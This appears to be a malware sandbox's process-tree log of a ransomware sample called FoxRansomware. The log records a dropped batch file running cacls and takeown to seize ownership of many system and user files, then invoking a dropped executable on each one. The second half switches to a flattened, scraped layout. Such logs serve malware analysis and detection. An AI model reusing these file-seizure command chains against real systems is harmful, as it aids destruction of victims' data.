  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7200)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3580)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 7468)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 5700)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 5272)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "ThemeSettings2013.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7472)
        fjPLyeD8.exe -accepteula "ThemeSettings2013.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6052)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2024)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 6944)
      cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3052; Modifies file permissions)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 8180)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "watermark.png" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6096)
        fjPLyeD8.exe -accepteula "watermark.png" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 3964)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 7132)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 2816)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 7172)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7344)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7192)
        fjPLyeD8.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6764)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 7464; Executes dropped EXE)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.0c3b1e04-d3ac-4538-ba9e-58b2295c4f33.1.etl""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5664)
      cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.0c3b1e04-d3ac-4538-ba9e-58b2295c4f33.1.etl" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 7648; Modifies file permissions)
      takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.0c3b1e04-d3ac-4538-ba9e-58b2295c4f33.1.etl"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7644; Suspicious use of AdjustPrivilegeToken)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MoUsoCoreWorker.0c3b1e04-d3ac-4538-ba9e-58b2295c4f33.1.etl" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7772)
        fjPLyeD8.exe -accepteula "MoUsoCoreWorker.0c3b1e04-d3ac-4538-ba9e-58b2295c4f33.1.etl" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7728; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 5064)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 2572)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 1300; Modifies file permissions)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 6164; Suspicious use of AdjustPrivilegeToken)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftNotepad.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 8020)
        fjPLyeD8.exe -accepteula "MicrosoftNotepad.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5656)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 6852)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 7596)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 7908)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7776)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7848)
        fjPLyeD8.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7252)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 7328)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 8008)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 5460)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 7520)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "NetworkPrinters.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7656)
        fjPLyeD8.exe -accepteula "NetworkPrinters.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 8112; Executes dropped EXE)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 7924)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5376)
      cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 7896)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3096)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "superbar.png" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7396)
        fjPLyeD8.exe -accepteula "superbar.png" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7376)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3020)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 8104)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 5536)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 5820; Executes dropped EXE)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6956)
        fjPLyeD8.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7456)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 5520)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5808)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6016)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 5576)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftLync2010.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7532)
        fjPLyeD8.exe -accepteula "MicrosoftLync2010.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 3012)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 5944)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5936)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 5860; Modifies file permissions)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2000)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7684)
        fjPLyeD8.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6024)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 4992)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 6124)
      cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 5476)
      takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3016)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6004)
        fjPLyeD8.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5144)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2160)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 2872)
      cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6976)
      takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4548)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 1228)
        fjPLyeD8.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7040)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 5940)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.12f674be-3c75-4b31-b769-275c1f222c20.1.etl""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 5812)
      cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.12f674be-3c75-4b31-b769-275c1f222c20.1.etl" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 1948; Modifies file permissions)
      takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.12f674be-3c75-4b31-b769-275c1f222c20.1.etl"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4856)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "NotificationUxBroker.12f674be-3c75-4b31-b769-275c1f222c20.1.etl" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7032)
        fjPLyeD8.exe -accepteula "NotificationUxBroker.12f674be-3c75-4b31-b769-275c1f222c20.1.etl" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 6444)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2924)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 7760)
      cacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 6224; Modifies file permissions)
      takeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 4252)
      C:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 7056)
        fjPLyeD8.exe -accepteula "OfficeIntegrator.ps1" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exe (PID 5304)
      fjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2220)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.0ef9b56b-e6df-479c-bbf8-c176bda819dc.1.etl""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 6364)
      cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.0ef9b56b-e6df-479c-bbf8-c176bda819dc.1.etl" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.0ef9b56b-e6df-479c-bbf8-c176bda819dc.1.etl"
- Modifies file permissions
PID:6912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "WuProvider.0ef9b56b-e6df-479c-bbf8-c176bda819dc.1.etl" -nobanner3⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "WuProvider.0ef9b56b-e6df-479c-bbf8-c176bda819dc.1.etl" -nobanner4⤵PID:6408
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm""2⤵PID:5912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm" /E /G Admin:F /C3⤵PID:6360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm"3⤵PID:6636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "ActivitiesCache.db-shm" -nobanner3⤵PID:6256
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "ActivitiesCache.db-shm" -nobanner4⤵PID:5840
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:6436
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:6304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:5480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:5308
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:5556
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:5716
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:7272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:3956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:6624
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:6644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.cfe5347f-51e6-474a-b053-ef23c10e3845.1.etl""2⤵PID:6044
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.cfe5347f-51e6-474a-b053-ef23c10e3845.1.etl" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.cfe5347f-51e6-474a-b053-ef23c10e3845.1.etl"3⤵PID:3572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "UpdateSessionOrchestration.cfe5347f-51e6-474a-b053-ef23c10e3845.1.etl" -nobanner3⤵PID:7568
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "UpdateSessionOrchestration.cfe5347f-51e6-474a-b053-ef23c10e3845.1.etl" -nobanner4⤵PID:3396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""2⤵PID:7060
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C3⤵PID:7008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"3⤵PID:7212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner3⤵PID:6796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner4⤵PID:6812
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""2⤵PID:3200
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C3⤵PID:5272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"3⤵PID:5152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner3⤵PID:6784
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner4⤵PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""2⤵PID:7128
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C3⤵PID:8180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"3⤵
- Modifies file permissions
PID:6180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "RoamingCredentialSettings.xml" -nobanner3⤵PID:3964
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "RoamingCredentialSettings.xml" -nobanner4⤵PID:6392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:7768
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:7344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
PID:7372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "background.png" -nobanner3⤵PID:6764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "background.png" -nobanner4⤵PID:5252
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5364
-
-
-
